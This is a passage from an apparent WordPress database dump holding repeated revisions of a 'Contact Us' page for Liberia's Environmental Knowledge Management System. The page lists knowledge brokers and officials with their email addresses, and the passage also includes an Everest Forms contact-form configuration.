00:59:24','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2884,1,'2019-11-28 01:00:04','2019-11-28 01:00:04','<h2>Contact Us</h2>\nPlease contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:\n\n<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\">\n<h2>EKMS Knowledge Brokers</h2>\nContact  our knowledge brokers for direct support or response to your questions:\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\">								</a><figcaption>J.S. Datuama Cammue</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\">								</a>\n\n<figcaption>Benjamin Karmorh</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\">								</a>\n\n<figcaption>Berexford S. Jallah</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\">								</a>\n\n<figcaption>John K. Jallah</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\">								</a>\n\n<figcaption>Kawusu Toure</figcaption></figure>\n<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong>\nEIA Manager, FDA\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\nMarketing and Forest Forecast\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong>\nDirector @ MOA\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssistant Minister, MME\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong>\nManager, CCCD Project\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:00:04','2019-11-28 01:00:04','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2889,1,'2019-11-28 01:18:46','2019-11-28 01:18:46','{\"id\":\"2889\",\"form_enabled\":\"1\",\"form_field_id\":2,\"form_fields\":{\"fullname\":{\"id\":\"fullname\",\"type\":\"text\",\"label\":\"Name\",\"meta-key\":\"name\",\"description\":\"\",\"required\":\"1\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\",\"input_mask\":\"\"},\"email\":{\"id\":\"email\",\"type\":\"email\",\"label\":\"Email\",\"meta-key\":\"email\",\"description\":\"\",\"required\":\"1\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"j2cuXg2s3C-1\":{\"id\":\"j2cuXg2s3C-1\",\"type\":\"select\",\"label\":\"Categories\",\"meta-key\":\"dropdown_8029\",\"choices\":{\"1\":{\"label\":\"General Inquiry\",\"value\":\"\"},\"2\":{\"label\":\"Biodiversity\",\"value\":\"\"},\"3\":{\"label\":\"Climate Change\",\"value\":\"\"},\"4\":{\"label\":\"Desertification\",\"value\":\"\"},\"5\":{\"label\":\"Documents (Policies, Reports, etc)\",\"value\":\"\"},\"6\":{\"label\":\"News or Blogs\",\"value\":\"\"},\"7\":{\"label\":\"EKMS Community Forum\",\"value\":\"\"}},\"description\":\"\",\"placeholder\":\"\",\"css\":\"\"},\"message\":{\"id\":\"message\",\"type\":\"textarea\",\"label\":\"Message\",\"meta-key\":\"message\",\"description\":\"\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"}},\"settings\":{\"form_title\":\"Contact Form\",\"form_description\":\"\",\"form_disable_message\":\"This form is disabled.\",\"successful_form_submission_message\":\"Thanks for contacting us! We will be in touch with you shortly.\",\"submission_message_scroll\":\"1\",\"redirect_to\":\"0\",\"custom_page\":\"80\",\"external_url\":\"\",\"layout_class\":\"default\",\"form_class\":\"\",\"submit_button_text\":\"Submit\",\"submit_button_processing_text\":\"Processing\\u2026\",\"submit_button_class\":\"\",\"honeypot\":\"1\",\"disabled_entries\":\"1\",\"email\":{\"enable_email_notification\":\"1\",\"connection_1\":{\"connection_name\":\"Admin Notification\",\"evf_to_email\":\"{admin_email}\",\"evf_from_name\":\"Official Website of the Environmental Knowledge Management System\",\"evf_from_email\":\"{admin_email}\",\"evf_reply_to\":\"{field_id=\\\"email\\\"}\",\"evf_email_subject\":\"New Form Entry \",\"evf_email_message\":\"{all_fields}\"}}},\"structure\":{\"row_1\":{\"grid_1\":[\"fullname\",\"email\",\"j2cuXg2s3C-1\",\"message\"]}}}','Contact Form','','publish','closed','closed','','contact-form','','','2019-11-28 02:06:18','2019-11-28 02:06:18','',0,'https://ekmsliberia.info/?post_type=everest_form&#038;p=2889',0,'everest_form','',0),(2890,1,'2019-11-28 01:35:33','2019-11-28 01:35:33','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:35:33','2019-11-28 01:35:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2891,1,'2019-11-28 01:36:58','2019-11-28 01:36:58','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:36:58','2019-11-28 01:36:58','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2892,1,'2019-11-28 01:39:47','2019-11-28 01:39:47','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:39:47','2019-11-28 01:39:47','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2893,1,'2019-11-28 01:40:41','2019-11-28 01:40:41','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:40:41','2019-11-28 01:40:41','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2894,1,'2019-11-28 01:41:18','2019-11-28 01:41:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-28 01:41:18','2019-11-28 01:41:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2895,1,'2019-11-28 01:45:39','2019-11-28 01:45:39','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" 